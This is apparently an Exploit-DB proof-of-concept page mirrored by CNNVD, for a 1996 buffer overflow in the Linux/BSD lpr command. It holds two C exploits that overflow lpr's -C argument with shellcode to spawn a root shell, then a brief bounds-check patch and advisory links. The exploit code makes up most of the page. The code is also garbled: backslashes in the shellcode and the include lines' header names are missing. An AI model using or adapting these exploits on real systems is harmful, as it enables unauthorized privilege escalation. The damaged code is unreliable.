https://www.exploit-db.com/exploits/325
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-025

多个Linux操作系统lpr包中的lineprinterdaemon(lpd)存在漏洞。本地用户通过发送邮件执行任意命令行参数提升根特权，已经证明的如使用-C选项指定配置文件。

-------------------------------------- linux_lpr_exploit.c ----------
#include 
#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

long get_esp(void)
{
   __asm__("movl %esp,%eaxn");
}

void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   u_char execshell[] = "xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07"
                        "x89x56x0fxb8x1bx56x34x12x35x10x56x34x12"
                        "x8dx4ex0bx8bxd1xcdx80x33xc0x40xcdx80xe8"
                        "xd7xffxffxff/bin/sh";
   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memoryn");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
------------------------------------------- bsd_lpr_exploit.c ------
#include 
#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

long get_esp(void)
{
   __asm__("movl %esp,%eaxn");
}

void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   char execshell[] =
   "xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0f"
   "x89x56x14x88x56x19x31xc0xb0x3bx8dx4ex0bx89xcax52"
   "x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01"
   "x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04";

   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memoryn");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
--------------------------------------------------------------------------

  Here is a little patch -- see file lpr.c, function card():
("!!" marks added lines)

--------------------------------------------------------------------------
static void card(c, p2)
        register int c;
        register char *p2;
{
        char buf[BUFSIZ];
        register char *p1 = buf;
        register int len = 2;


        if (strlen(p2) > BUFSIZ-2)                     /* !! */
        {                                              /* !! */
                printf("No, thanks...n");             /* !! */
                exit(1);                               /* !! */
        }
        *p1++ = c;
        while ((c = *p2++) != '') {
                *p1++ = (c == 'n') ? ' ' : c;
                len++;
        }
        *p1++ = 'n';
        write(tfd, buf, len);
}


// milw0rm.com [1996-10-25]

来源:US-CERTVulnerabilityNote:VU#39001
名称:VU#39001
链接:http://www.kb.cert.org/vuls/id/39001
来源:XF
名称:redhat-lpd-print-control(3841)
链接:http://xforce.iss.net/xforce/xfdb/3841
来源:BID
名称:927
链接:http://www.securityfocus.com/bid/927
来源:REDHAT
名称:RHSA-2000:002
链接:http://www.redhat.com/support/errata/RHSA-2000-002.html
来源:DEBIAN
名称:20000109lpr–accesscontrolproblemandrootexploit
链接:http://www.debian.org/security/2000/20000109
来源:www.atstake.com
链接:http://www.atstake.com/research/advisories/2000/lpd_advisory.txt
来源:BUGTRAQ
名称:20000108L0phtAdvisory:LPD,RH4.x,5.x,6.x
链接:http://seclists.org/lists/bugtraq/2000/Jan/0116.html
来源:SGI
名称:20021104-01-P
链接:ftp://patches.sgi.com/support/free/security/advisories/20021104-01-P